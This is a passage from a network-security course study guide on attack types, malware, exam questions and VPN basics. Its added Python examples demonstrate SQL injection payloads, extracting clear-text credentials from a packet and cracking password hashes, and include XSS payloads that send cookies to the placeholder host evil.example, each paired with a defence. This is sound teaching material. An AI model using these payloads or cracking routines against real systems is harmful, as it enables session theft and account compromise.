
Study Material
(Security Specialist_BNCSD502B)
_______________________________________________________________________________________

Table of Contents

Serial  Topic                                                  Module  Pages
1.      The security threats facing modern network             1       2-10
        infrastructure
        MCQ                                                    1       11-12
        SAQ                                                    1       12-13
2.      Fundamentals of VPN technology and cryptography        2       13-28
        MCQ                                                    2       29
        SAQ                                                    2       30
3.      AAA Authentication                                     5       31-38
        MCQ                                                    5       39
        SAQ                                                    5       40
4.      Network Address Translation                            4       41-43
        MCQ                                                    4       44
        SAQ                                                    4       45
5.      Access Control List                                    3       46-52
        MCQ                                                    3       53
        SAQ                                                    3       53

MODULE - I
THE SECURITY THREATS FACING MODERN NETWORK INFRASTRUCTURE
Ethical Hacking
 Ethical hacking is hacking carried out with the permission of the system owner, in order to
find weaknesses in a system so that they can be fixed before a real attacker finds them.
 Its goals are:
 To find flaws and vulnerabilities
 To determine the risk to the organization

IP Address and MAC Address

 IP address: every device on a network is assigned an IP address so that it can be located
(addressed) on the network.
 MAC (Media Access Control) address: a unique identifier assigned to every network interface
on every device. Because it can be changed in software, a MAC address identifies an interface
but must not be relied on to authenticate it.

Common Tools Used by Ethical Hackers

 Metasploit
 Wireshark
 Nmap
 John the Ripper
 Maltego

Types of Ethical Hackers

 Grey-box penetration testers (partial knowledge of the target)
 Black-box penetration testers (no prior knowledge of the target)
 White-box penetration testers (full knowledge, including source code and configuration)

Footprinting in Ethical Hacking and the Techniques Used

 Footprinting is the process of gathering as much information as possible about the target
network before attempting to gain access to it. It is the first step an attacker takes.
 Open source footprinting: searching public sources for details such as the contact
information of administrators, which can later be used for password guessing or social
engineering.
 Network enumeration: identifying the domain names and network blocks that belong to the
target.
 Scanning: once the network blocks are known, probing them to find active hosts, for example
with ICMP (Internet Control Message Protocol) echo requests, and identifying the ports that are
open on them.
 Stack fingerprinting: once hosts and ports have been mapped by scanning, the final
footprinting step is to identify each host's operating system from the characteristic behaviour
of its TCP/IP stack.

Brute Force Hacking

 A brute-force attack tries many candidate passwords, in the limit every possible one, until
one grants access to a system or network resource. It is slow, and the number of attempts grows
exponentially with the password length and character set. Hydra is a commonly used tool for
brute-forcing network login services.

DoS (Denial of Service) Attack

 A denial-of-service attack floods a network or host with useless traffic so that it can no
longer serve legitimate users. Although a DoS attack does not by itself steal information or
breach confidentiality, it can cost the website owner a great deal of money and time.

Common Forms of DoS Attack

 Buffer overflow attacks
 SYN flood attacks
 Teardrop attacks
 Smurf attacks
 Viruses

SQL Injection
SQL injection is one of the techniques used to steal data from organizations; it exploits a
fault in the application code. SQL injection happens when untrusted input is inserted directly
into an SQL query string, so that the input changes the syntax of the query in ways the
developer did not intend (for example, turning a login check into a query that matches every
user).
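To make the mechanism concrete, here is an added worked example that is not part of the original study material. It uses Python's built-in sqlite3 module with a constructed two-user table (the user names, passwords and the login function are all invented for the demonstration) and runs the same two classic payloads against a query built by string formatting and against a parameterised query:

```python
import sqlite3


def make_db():
    """Constructed sample database (not from the study material)."""
    conn = sqlite3.connect(":memory:")
    # Passwords are stored in clear here only to keep the injection demo short;
    # a real application stores salted password hashes (see the password section).
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret-alice", "admin"), ("bob", "hunter2", "staff")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Untrusted input is spliced into the SQL text, so it can change the query's syntax."""
    query = (
        "SELECT username, role FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Parameterised query: values travel separately from the SQL text and are never parsed as SQL."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


def demo():
    conn = make_db()
    comment_payload = "alice' --"        # closes the string literal, comments out the password check
    tautology_payload = "' OR '1'='1"    # makes the WHERE clause true for every row
    return {
        # attacker knows a username but not the password
        "vuln_comment": login_vulnerable(conn, comment_payload, "wrong"),
        # attacker knows nothing: the tautology returns every user
        "vuln_tautology": login_vulnerable(conn, "nobody", tautology_payload),
        # the same payloads against the parameterised version match no row
        "safe_comment": login_safe(conn, comment_payload, "wrong"),
        "safe_tautology": login_safe(conn, "nobody", tautology_payload),
        # a legitimate login still works
        "safe_legit": login_safe(conn, "bob", "hunter2"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:15} -> {rows}")
```

The comment payload only needs a known user name; the tautology payload needs nothing and returns every row, which is how attackers dump whole tables. The fix is not to filter quotes but to keep data out of the SQL text entirely with bound parameters (the `?` placeholders), so the database engine never parses attacker input as SQL.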

Types of Computer-Based Social Engineering Attacks

 Phishing
 Baiting
 Online scams

Phishing
 Phishing uses fake emails, chat messages or websites that impersonate a real system, with the
aim of stealing the information (such as login credentials) that the victim would normally
enter on the genuine site.

Network Sniffing
A network sniffer monitors data flowing over network links. By letting you capture and view
packet-level data on your network, a sniffer can help you locate network problems. Sniffers can
be used both for legitimate network management and for stealing information off the network:
any protocol that sends credentials in clear text (Telnet, FTP, HTTP without TLS) exposes them
to whoever can see the traffic.
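As an added illustration (not from the original material), the following Python code does what a sniffer does at the packet level: it decodes an Ethernet II / IPv4 / TCP frame with the struct module and pulls the FTP USER and PASS commands out of the payload. The frame is constructed in the code itself, with invented addresses and credentials, so nothing is captured from a live network; on a real system the same parse function would be fed frames read from a raw socket or a pcap file.

```python
import socket
import struct

ETH_HDR = "!6s6sH"          # dst MAC, src MAC, ethertype
IP_HDR = "!BBHHHBBH4s4s"    # 20-byte IPv4 header without options
TCP_HDR = "!HHIIBBHHH"      # 20-byte TCP header without options


def ip_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement sum; returns 0 when run over a header whose checksum is valid."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_sample_frame() -> bytes:
    """Constructed FTP login frame (not a real capture): 192.168.1.10 -> 10.0.0.5:21."""
    payload = b"USER alice\r\nPASS hunter2\r\n"
    tcp = struct.pack(TCP_HDR, 54321, 21, 1000, 2000, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    fields = [0x45, 0, total_len, 0x1234, 0, 64, 6, 0,
              socket.inet_aton("192.168.1.10"), socket.inet_aton("10.0.0.5")]
    fields[7] = ip_checksum(struct.pack(IP_HDR, *fields))   # fill in the header checksum
    ip = struct.pack(IP_HDR, *fields)
    eth = struct.pack(ETH_HDR, bytes.fromhex("001122334455"),
                      bytes.fromhex("66778899aabb"), 0x0800)
    return eth + ip + tcp + payload


def parse_frame(frame: bytes) -> dict:
    """Decode the Ethernet/IPv4/TCP headers the way a sniffer does and return the payload."""
    dst_mac, src_mac, ethertype = struct.unpack_from(ETH_HDR, frame, 0)
    if ethertype != 0x0800:
        raise ValueError("not IPv4")
    ip_start = struct.calcsize(ETH_HDR)
    ver_ihl = frame[ip_start]
    ihl = (ver_ihl & 0x0F) * 4
    ip_hdr = frame[ip_start:ip_start + ihl]
    if ver_ihl >> 4 != 4 or ip_checksum(ip_hdr) != 0:
        raise ValueError("bad IPv4 header")
    _, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack(IP_HDR, ip_hdr[:20])
    if proto != 6:
        raise ValueError("not TCP")
    tcp_start = ip_start + ihl
    sport, dport, seq, ack, offset_byte, flags, _, _, _ = struct.unpack_from(TCP_HDR, frame, tcp_start)
    data_start = tcp_start + (offset_byte >> 4) * 4
    payload = frame[data_start:ip_start + total_len]
    return {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl,
        "sport": sport, "dport": dport, "flags": flags, "payload": payload,
    }


def find_cleartext_credentials(payload: bytes):
    """Pull USER/PASS lines out of an FTP (or similar clear-text) command stream."""
    user = password = None
    for line in payload.decode("ascii", errors="replace").splitlines():
        if line.upper().startswith("USER "):
            user = line[5:]
        elif line.upper().startswith("PASS "):
            password = line[5:]
    return user, password


if __name__ == "__main__":
    pkt = parse_frame(build_sample_frame())
    print(f"{pkt['src']}:{pkt['sport']} -> {pkt['dst']}:{pkt['dport']}  {pkt['payload']!r}")
    print("credentials:", find_cleartext_credentials(pkt["payload"]))
```

The parser validates the IPv4 header checksum before trusting the length fields, which is the check that keeps a decoder from being misled by a corrupted or crafted frame. The credential extractor is the simplest possible case; it works only because FTP sends the password in clear, which is exactly why such protocols should be replaced by their encrypted equivalents.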

Cross-Site Scripting and Its Types

 Cross-site scripting (XSS) exploits known vulnerabilities in web applications, their servers
or the plug-ins that users rely upon. The attacker inserts malicious code (usually JavaScript)
into a link or a page that appears to come from a trustworthy source. When a user follows the
link or loads the page, the code runs in the user's browser as part of the trusted site,
allowing the attacker to steal information such as session cookies or to act as the user.
 There are three types of cross-site scripting:
 Non-persistent (reflected): the payload arrives in the request and is echoed straight back
 Persistent (stored): the payload is saved by the application and served to later visitors
 DOM-based: the payload is processed by client-side script, as opposed to the server-side
reflected and stored variants
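The server-side flaw behind reflected and stored XSS, and its fix, as an added Python example that is not part of the original material. The page template, the comment store and the payloads are constructed for the demonstration. The vulnerable renderer concatenates user input into HTML; the safe one applies html.escape to every untrusted value before it is placed in a text node or a quoted attribute. This server-side encoding does not address DOM-based XSS, where the unsafe processing happens in the browser's own script.

```python
import html

# Constructed page template (not from the study material).
PAGE = """<html><body>
<form action="/search"><input name="q" value="{q_attr}"></form>
<p>Results for: {q_text}</p>
<ul>{comments}</ul>
</body></html>"""

# Constructed payloads: the first breaks out of the value="..." attribute (reflected),
# the second was "saved" earlier by another user (stored / persistent).
REFLECTED_PAYLOAD = '"><script>document.location="http://evil.example/?c="+document.cookie</script>'
STORED_PAYLOAD = '<img src=x onerror="fetch(\'http://evil.example/?c=\'+document.cookie)">'


def render_vulnerable(q: str, stored_comments) -> str:
    """Echoes the search term (reflected XSS) and saved comments (stored XSS) as raw HTML."""
    items = "".join("<li>%s</li>" % c for c in stored_comments)
    return PAGE.format(q_attr=q, q_text=q, comments=items)


def render_safe(q: str, stored_comments) -> str:
    """Output encoding: every untrusted value is HTML-escaped before it lands in the page."""
    # quote=True also encodes " and ', which matters inside the quoted value="..." attribute
    safe_q = html.escape(q, quote=True)
    items = "".join("<li>%s</li>" % html.escape(c, quote=True) for c in stored_comments)
    return PAGE.format(q_attr=safe_q, q_text=safe_q, comments=items)


def active_markup(rendered: str) -> list:
    """Which attacker-controlled tags survive as real markup (a raw '<' starts a tag)."""
    markers = ["<script", "<img"]
    return [m for m in markers if m in rendered.lower()]


def demo():
    comments = ["Nice article!", STORED_PAYLOAD]
    return {
        "vulnerable": active_markup(render_vulnerable(REFLECTED_PAYLOAD, comments)),
        "safe": active_markup(render_safe(REFLECTED_PAYLOAD, comments)),
    }


if __name__ == "__main__":
    print(demo())
    print(render_safe(REFLECTED_PAYLOAD, [STORED_PAYLOAD]))
```

In the escaped output the payloads are still present, but as `&lt;script&gt;` and `&lt;img` text that the browser displays rather than executes. Encoding has to match the context: html.escape covers text nodes and quoted attributes, while placing input inside a `<script>` block or a URL needs a different encoder, and a Content-Security-Policy adds a second layer if an encoding step is ever missed.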

Burp Suite
 Burp Suite is an integrated platform for attacking (testing) web applications. It consists of
all the Burp tools required for attacking an application, which share a common framework for
handling HTTP requests, upstream proxies, alerting, logging and so on.

Types of Password Cracking Techniques

 Brute-force attacks
 Hybrid attacks
 Syllable attacks
 Rule-based attacks

Hacking Stages
 Hacking, or targeting a machine, has the following five phases:
 Reconnaissance (surveillance): the initial stage, where the attacker gathers as much
information as possible about the target.
 Scanning: this stage uses the information gathered during reconnaissance to probe the
victim. The attacker can use automated tools here, including port scanners, network mappers
and vulnerability scanners.
 Gaining access: this is where the real intrusion happens. The attacker exploits the
weaknesses found during reconnaissance and scanning to get into the system.
 Maintaining access: once access is gained, attackers need to keep it for future
exploitation and attacks, securing their exclusive access with backdoors, rootkits and Trojans.
 Covering tracks: once attackers have gained and maintained access, they remove the evidence
of their activity (logs, tools, accounts) to avoid detection. This also lets them continue
using the compromised system and keeps them clear of legal consequences.

Types of Password Attack

 Guessing: simple, repeated attempts using common passwords or known facts about the user.
 Stealing: physically or electronically acquiring a user's password, which can include
sniffing network communications.
 Dictionary attacks: hashing each word of a wordlist and comparing it with the stolen hash.
 Brute-force attacks: trying every combination of a character set up to some length.
 Rainbow tables: precomputed hash-to-password tables; effective only against unsalted hashes.
 Hybrid password attacks: dictionary words mutated by rules (case changes, appended digits).
 Birthday attacks: exploiting hash collisions, which become likely after far fewer attempts
than the size of the hash space suggests.
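The following added Python example (not from the original material) ties together the brute-force, dictionary, hybrid and rainbow-table attacks listed above and in the two earlier password sections. The wordlist and the "leaked" hashes are constructed; the hashes are unsalted SHA-256, which is exactly the kind of storage these attacks are effective against. The last two functions show the defence a practitioner would apply: a per-user random salt, which makes precomputed tables useless, and PBKDF2 with a high iteration count, which makes every guess expensive.

```python
import hashlib
import hmac
import itertools
import os

# Constructed wordlist (not from the study material); real ones hold millions of entries.
WORDLIST = ["password", "letmein", "summer", "dragon", "welcome"]


def fast_hash(pw: str) -> str:
    """Unsalted SHA-256: the kind of password storage these attacks are built for."""
    return hashlib.sha256(pw.encode()).hexdigest()


def dictionary_attack(target_hash: str, words):
    """Dictionary attack: hash each word as-is and compare."""
    for w in words:
        if fast_hash(w) == target_hash:
            return w
    return None


def hybrid_candidates(words, max_digits=2):
    """Hybrid / rule-based attack: dictionary words mutated by common rules."""
    for w in words:
        for base in (w, w.capitalize(), w.upper()):
            yield base                                          # case variants of the word
            yield base.translate(str.maketrans("aeo", "@30"))   # simple leet substitution
            for n in range(1, max_digits + 1):                  # appended digits: summer1, Summer21
                for digits in itertools.product("0123456789", repeat=n):
                    yield base + "".join(digits)


def hybrid_attack(target_hash: str, words):
    for cand in hybrid_candidates(words):
        if fast_hash(cand) == target_hash:
            return cand
    return None


def precomputed_table(words) -> dict:
    """hash -> password map built once and reused for every leaked hash: a (non-compressed)
    stand-in for a rainbow table. It only works because the hashes are unsalted."""
    return {fast_hash(c): c for c in hybrid_candidates(words)}


def brute_force_attack(target_hash: str, alphabet="abcdefghijklmnopqrstuvwxyz", max_len=3):
    """Exhaustive search; cost grows as len(alphabet) ** length, which is why length matters."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=n):
            cand = "".join(combo)
            if fast_hash(cand) == target_hash:
                return cand
    return None


# Defence: per-user random salt plus a deliberately slow key-derivation function.
def store_password(pw: str, iterations: int = 100_000):
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations)
    return salt, iterations, digest


def verify_password(pw: str, record) -> bool:
    salt, iterations, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


def demo():
    leaked = {"u1": fast_hash("dragon"), "u2": fast_hash("Summer21"), "u3": fast_hash("qzx")}
    table = precomputed_table(WORDLIST)
    return {
        "dictionary": {u: dictionary_attack(h, WORDLIST) for u, h in leaked.items()},
        "hybrid": {u: hybrid_attack(h, WORDLIST) for u, h in leaked.items()},
        "table_lookup": {u: table.get(h) for u, h in leaked.items()},
        "brute_force_u3": brute_force_attack(leaked["u3"]),
    }


if __name__ == "__main__":
    print(demo())
    rec_a, rec_b = store_password("Summer21"), store_password("Summer21")
    print("same password, different stored digests:", rec_a[2] != rec_b[2])
    print("login check:", verify_password("Summer21", rec_a), verify_password("summer21", rec_a))
```

Running demo() shows the escalation: the plain dictionary recovers only "dragon", the hybrid rules also recover "Summer21", the precomputed table recovers both with a single lookup each, and only the short random password falls to brute force. With the salted PBKDF2 records, two users with the same password get different digests, so no table built in advance matches, and each guess costs 100,000 hash iterations instead of one.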
Hacking vs. Ethical Hacking
 Hacking: accessing a system illegally (unauthorized access)
 Ethical hacking: accessing a system legally, with the owner's permission (penetration testing)

Enumeration
 Extracting information (such as user accounts, shares and running services) from systems and
files
Cisco Self-Defending Network Architecture:
 A new generation of interactive business communication and collaboration
technologies provides tremendous productivity and flexibility gains for organizations of
all kinds. But this unprecedented connectivity also unleashes new, complex security
risks, including:
 Increased exposure to security threats—Ubiquitous access to Web-enabled
applications and services enables users to work from anywhere, anytime—but also
places businesses at risk anywhere, anytime.
 An eroding network perimeter—The traditional network barriers that separated trusted
from untrusted and "inside" from "outside" are now disappearing. As more applications
become directly accessible to remote users and systems, the concept of the network
perimeter becomes increasingly vague and more difficult to protect.
 Evolving threats—Information attacks of the past were largely an issue of cyber-
vandalism, with hackers primarily looking for fame. Today’s attacks are a profit- driven
business, often controlled by organized crime. The modern attacker uses a patient,
“stealth” approach to eventually achieve a successful attack. In addition, modern
attackers often avoid technology defences, using spam, phishing attacks, and
fraudulent Web links to target an organization’s weakest link: human beings. As
security risks have evolved, so have organizations’ approaches to them. Where
information security was once a technology issue, today it is a business issue—
representing a more significant cost and operational challenge, but a fundamental
business enabler as well. More and more organizations are implementing formal
programs to reduce IT risk, especially security and compliance risks. As regulatory
compliance becomes a core requirement for organizations in more industries,
businesses must develop new capabilities for controlling the kinds of information
traversing their network, how that information is used, and who can access it.
Organizations not only face the challenge of becoming compliant, but of staying
compliant as the network continuously evolves with business needs.

 Organizations are wrestling with information security demands that span many
overarching business challenges such as complying with regulatory requirements,
preventing data loss, and blocking malware. The problem is that dealing with these
types of challenges requires a true security solution—not just security products. To
prevent data loss alone, for example, businesses need a combination of strong
perimeter defences, malware defences, identity services, endpoint security, policy
enforcement mechanisms, and security monitoring tools, as well as a strong plan for
making them all work in concert. No single security product can provide all of these
capabilities. So, today’s businesses need security solutions that combine multiple
best-of-breed products and approaches into a single, autonomous defence system.
They need a truly holistic security solutions approach to network defence.

Definition of Computer Virus:


 A computer virus is a type of malicious software, or malware, that spreads between
computers and causes damage to data and software.
 Computer viruses aim to disrupt systems, cause major operational issues, and result
in data loss and leakage. A key thing to know about computer viruses is that they are
designed to spread across programs and systems. Computer viruses typically attach
to an executable host file, which results in their viral codes executing when a file is
opened. The code then spreads from the document or software it is attached to via
networks, drives, file-sharing programs, or infected email attachments.

 Common Signs of Computer Viruses

 A computer virus will more than likely have an adverse effect on the device it resides on
and may be discoverable through common signs of performance loss, including:
 Speed of system: a computer running slower than usual is one of the most common signs that
the device has a virus. This includes the system itself running slowly, as well as applications
and internet speed suffering. If a computer does not have demanding applications installed and
is still running slowly, it may be infected with a virus.
 Pop-up windows: unwanted pop-up windows appearing on a computer or in a web browser are a
telltale sign of malware, viruses or spyware affecting the device.
 Programs self-executing or closing: if programs unexpectedly close by themselves, it is
highly likely that the software has been infected with some form of virus or malware. Another
indicator is applications failing to load when selected from the Start menu or their desktop
icon.
 Accounts being logged out: some viruses are designed to affect specific applications, which
will either cause them to crash or force the user to log out of the service.
 Crashing of the device: system crashes and the computer unexpectedly shutting down are
common indicators of a virus. Viruses cause computers to act in strange ways, which may include
opening files by themselves, displaying unusual error messages, or pressing keys at random.
 Mass emails being sent from your email account: viruses are commonly spread via email, and
attackers use other people's accounts to spread malware and carry out wider attacks. If an
account's outbox contains emails the user did not send, this could be a sign of infection.
 Changes to your homepage: any unexpected change to a computer, such as the browser's homepage
being amended or other browser settings being updated, is a sign that a virus may be present.

How Do Computer Viruses Attack and Spread?


 In the early days of computers, viruses were spread between devices using floppy
disks. Nowadays, viruses can still be spread via hard disks and Universal Serial Bus
(USB) devices, but they are more likely to be passed between devices through the
internet.
Computer viruses can be spread via email, with some even capable of hijacking email
software to spread themselves. Others may attach to legitimate software, within software
packs, or infect code, and other viruses can be downloaded from compromised
application stores and infected code repositories. A key feature of any computer virus is it
requires a victim to execute its code or payload, which means the host application should
be running.

Types of Computer Viruses:


 There are several types of computer viruses that can infect devices. This section
will cover computer virus protections and how to get rid of computer viruses.
 Resident Virus
 Viruses propagate themselves by infecting applications on a host computer. A
resident virus achieves this by infecting applications as they are opened by a user.A
non-resident virus is capable of infecting executable files when programs are not
running.
 Multipartite Virus
 A multipartite virus uses multiple methods to infect and spread across computers. It
typically remains in the computer's memory to infect the hard disk, then spreads to further
drives by altering the content of applications. This results in performance lag and
application memory running low.
 Multipartite viruses can be avoided by not opening attachments from untrusted sources and
by installing trusted antivirus software. Removal requires cleaning both the boot sector and
the computer's entire disk, since the virus infects both.
 Direct Action
 A direct action virus accesses a computer's main memory and infects all programs, files, and
folders located in the autoexec.bat path, before deleting itself. This virus typically alters
the performance of a system but is capable of destroying all data on the computer's hard disk
and any USB device attached to it. Direct action viruses can be avoided through the use of
antivirus scanners. They are easy to detect, and infected files are easy to restore.
 Browser Hijacker
 A browser hijacker changes the settings of web browsers, such as replacing the homepage,
editing the new tab page, and changing the default search engine. Technically it is not a
virus because it cannot infect files, but it can be hugely damaging to computer users, who
often cannot restore their homepage or search engine. It may also contain adware that causes
unwanted pop-ups and advertisements.
 Browser hijackers typically attach to free software and malicious applications from
unverified websites or app stores, so only use trusted software and reliable antivirus
software.
 Overwrite Virus
 Overwrite viruses are extremely dangerous. They delete data and replace it with their own
file content or code. Once files are infected, their original content cannot be recovered, and
the virus can affect Windows, DOS, Linux, and Apple systems. The only way to remove this virus
is to delete all of the files it has infected, which could be devastating. The best protection
is a trusted antivirus solution kept up to date, together with offline backups from which the
overwritten files can be restored.

 Web Scripting Virus
 A web scripting virus attacks web browser security, enabling a hacker to inject web pages
with malicious code, or client-side scripting. This allows cyber criminals to attack major
websites, such as social networking sites, email providers, and any site that accepts user
input or reviews. Attackers can use the virus to send spam, commit fraud, and damage server
files.
 Protecting against web scripting relies on deploying real-time web browser protection
software, using cookie security, disabling scripts, and using malicious software removal
tools.
 File Infector
 A file infector is one of the most common computer viruses. It overwrites files when they
are opened and can quickly spread across systems and networks. It largely affects files with
.exe or .com extensions. The best way to avoid file infector viruses is to only download
official software and deploy an antivirus solution.
 Network Virus
 Network viruses are extremely dangerous because they can completely cripple entire computer
networks. They are often difficult to discover, as the virus could be hidden within any
computer on an infected network. These viruses replicate and spread by using the network to
transfer themselves to connected devices. Trusted, robust antivirus solutions and advanced
firewalls are crucial to protecting against network viruses.
 Boot Sector Virus
 A boot sector virus targets a computer's master boot record (MBR). The virus injects its
code into a hard disk's partition table, then moves into main memory when the computer
restarts. Its presence is signalled by boot-up problems, poor system performance, and the
system being unable to locate the hard disk. Most modern computers come with boot sector
safeguards (such as UEFI Secure Boot) that restrict the potential of this type of virus.
 Steps to protect against a boot sector virus include ensuring disks are write-protected and
not starting up a computer with untrusted external drives connected.

More About Computer Viruses Through Examples:

There are common examples of what computer and internet users believe to be viruses, but are
technically incorrect.
 Is a Trojan a Virus?
o A Trojan horse is a type of program that pretends to be something it is not in order to get
onto a device and infect it with malware. A "Trojan horse virus" is therefore a virus disguised
to look like something it is not. For example, viruses can be hidden within unofficial games,
applications, file-sharing sites, and bootlegged movies.
 Is a Worm a Virus?
o A computer worm is not a virus. Worms do not need a host program and can spread between
systems and networks without user action, whereas a virus requires a user to execute its code.
 Is Ransomware a Virus?
o Ransomware is when attackers lock victims out of their system or files and demand a ransom
to unlock access. Viruses can be used to carry out ransomware attacks.
 Is a Rootkit a Virus?
o A rootkit is not a virus. Rootkits are software packages that give attackers privileged,
hidden access to systems. They cannot self-replicate or spread across systems by themselves.
 Is a Software Bug a Virus?
o "Bug" is a common word used to describe problems with computers, but a software bug is not
a virus. A bug is a flaw or mistake in software code, which hackers can exploit to launch a
cyberattack or spread malware.

How to Protect Your Computer from Viruses:

 There are several ways to protect your computer from viruses, including:
 Use a Trusted Antivirus Product
o Trusted antivirus products are crucial to stop malware attacks and prevent computers from
being infected with viruses. They protect devices through regular scans and by identifying and
blocking malware.
 Avoid Clicking Pop-up Advertisements
o Unwanted pop-up advertisements are more than likely to be linked to computer viruses and
malware. Never click on pop-up advertisements, because this can lead to inadvertently
downloading viruses onto a computer.
 Scan Your Email Attachments
o A popular way to protect your device from computer viruses is to avoid suspicious email
attachments, which are commonly used to spread malware. Antivirus solutions can be used to
scan email attachments for potential viruses.
 Scan the Files That You Download Using File-Sharing Programs
o File-sharing programs, particularly unofficial sites, are also popular resources for
attackers to spread computer viruses. Avoid downloading applications, games, or software from
unofficial sites, and always scan files that have been downloaded from any file-sharing
program.
 Chapter Related Questions (MCQ)

1. List some common security threats facing modern networks.
2. Explain what a distributed denial of service (DDoS) attack is.
3. Describe how hackers exploit vulnerabilities to launch attacks on networks.
4. Analyze the purpose of a firewall in network security.
5. Evaluate the risks associated with unsecured wireless networks.
6. Design a man-in-the-middle (MitM) attack.
7. Explain how network traffic analysis helps detect and prevent security threats.
8. Design a network segmentation strategy.
9. Evaluate the potential consequences of a data breach on network security and privacy.
10. Explain the role of social engineering in network security breaches.
11. Develop a set of best practices for securing network devices, such as routers and switches.
12. Define what a zero-day vulnerability is.
13. Explain the purpose of configuring access control lists (ACLs) on a network device.
14. Compare and contrast a firewall and an intrusion detection system (IDS).
15. Design a strong access control and user authentication mechanism.
16. Explain the significance of regular security audits and penetration testing in network
environments.
17. Develop a disaster recovery plan for a network environment.
18. Evaluate the potential security risks associated with misconfigured or overly permissive access
control lists (ACLs).
19. Explain the role of encryption in securing network communications and data privacy.
20. Evaluate the potential security risks associated with using default credentials on network
devices.
21. Compare and contrast source NAT and destination NAT.
22. Design a network monitoring and logging strategy.
23. Evaluate the potential security risks associated with misconfigured or weak wireless network
encryption.
24. Explain the purpose of network traffic analysis in network security.
25. Evaluate the potential consequences of a network security breach on an organization.
26. Explain the significance of network segmentation in network security.
27. Design an intrusion detection and prevention system (IDPS) strategy.
28. Evaluate the potential impact of a compromised authentication server on network security.
 Chapter Related Questions (SAQ)

1. What is an Access Control List (ACL)?
2. Differentiate between standard and extended ACLs.
3. How does an ACL determine which packets are allowed or denied access to a network?
4. Write an ACL statement that permits all traffic from source IP address 192.168.1.0/24 to
destination IP address 10.0.0.0/24.
5. Explain the order in which ACL statements are processed and how that affects packet
filtering.
6. Evaluate the advantages and disadvantages of using ACLs for network security.
7. Design an ACL that allows HTTP traffic from any source IP address but denies FTP
traffic from IP address 192.168.1.5.
8. What are the different types of ACLs available on Cisco devices?
9. What is the purpose of an ACL wildcard mask?
9a. How does an implicit "deny all" statement affect the behavior of an ACL?
10. Configure an ACL to permit Telnet traffic from a specific source IP address while denying
all other Telnet traffic.
11. Discuss the potential impact of an incorrect ACL configuration on network traffic flow.
12. Assess the significance of proper ACL placement within a network topology.
13. Create an extended ACL that allows ICMP traffic from any source IP address to a
specific destination IP address.
14. What are the two primary categories of ACLs based on the direction of packet filtering?
15. What is the purpose of a numbered ACL?
16. How does a named ACL differ from a numbered ACL in terms of configuration and
usage?
17. Configure a standard ACL that permits SSH traffic from a specific source network while
denying all other SSH traffic.
18. Explain the potential consequences of overlapping ACL statements and how to resolve
them.
19. Assess the impact of a misconfigured ACL on network performance and security.

20. Design an ACL that allows HTTP traffic from a specific source IP address range and
denies HTTPS traffic from any source IP address.

21. What is the order of evaluation for ACL entries?


22. What is an ACL hit count, and how can it be used for troubleshooting?
23. How does an extended ACL differ from a standard ACL in terms of filtering criteria?
24. Configure an ACL to permit DNS traffic from any source IP address but deny ICMP traffic
from a specific source IP address.

25. Discuss the role of wildcard masks in defining ACL filtering criteria.
26. Evaluate the potential security risks associated with misconfigured or overly permissive
ACLs.

27. Create an extended ACL that allows SMTP traffic from any source IP address to a
specific destination IP address.

28. What are the default behaviors of an ACL when no explicit permit or deny statements
are configured?
29. What is the purpose of applying ACLs on router interfaces?

MODULE - II
FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY
A virtual private network (VPN) is used to transport data from a private network to another
private network over a public network, such as the Internet, using encryption to keep the
data confidential. In other words, a VPN is an encrypted connection between private
networks over a public network, most often the Internet. VPNs provide the following
services:

 Confidentiality: VPNs prevent anyone in the middle of the Internet from being able to read
the data. The Internet is inherently insecure, as data typically crosses networks and devices
under different administrative control. Even if someone is able to intercept data at some
point in the network, they will not be able to interpret it because it is encrypted.

 Integrity: VPNs ensure that data was not modified in any way as it traversed the Internet.

 Authentication: VPNs use authentication to verify that the device at the other end of the
VPN is a legitimate device and not an attacker impersonating one.

 Anti-Replay: VPNs detect and discard copies of legitimate packets that an attacker has
captured and re-sent. Each protected packet carries a sequence number, and the receiver
rejects numbers it has already seen or that fall outside its replay window.

A VPN is essentially a secure channel, often called a tunnel, between two devices or end
points near the edge of the Internet. The VPN end points encrypt the whole original IP
packet, meaning that someone who manages to see a copy of the packet as it traverses the
network cannot understand the contents of the original packet. The VPN end points also
prepend new headers to the encrypted packet. These additional headers carry the fields (such
as a security parameter index and a sequence number) that allow the VPN devices to perform
all of their functions.

VPNs have several advantages over other WAN technologies, some of which are
summarized here:

 Cost: Internet VPN solutions can be much cheaper than alternate private WAN options
available today.

 Security: Modern VPN solutions can be as secure as private WAN options and are being used
even by organizations with the most stringent security requirements, such as credit card
companies.

 Scalability: Internet VPN solutions can be scaled quickly and cost-effectively to a large
number of sites. Each location can choose from multiple options of Internet connectivity.

FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY (II)
Remote Access VPN
A remote-access VPN allows individual users to establish secure connections with a
remote computer network. Those users can access the secure resources on that network
as if they were directly plugged in to the network's servers. An example of a company that
needs a remote-access VPN is a large firm with hundreds of salespeople in the field.
Another name for this type of VPN is virtual private dial-up network (VPDN),
acknowledging that in its earliest form, a remote-access VPN required dialing in to a server
using an analog telephone system.

There are two components required in a remote-access VPN. The first is a network
access server (NAS), also called a media gateway or a remote-access server (RAS).
A NAS might be a dedicated server, or it might be one of multiple software applications
running on a shared server. It is a NAS that a user connects to from the Internet in order to
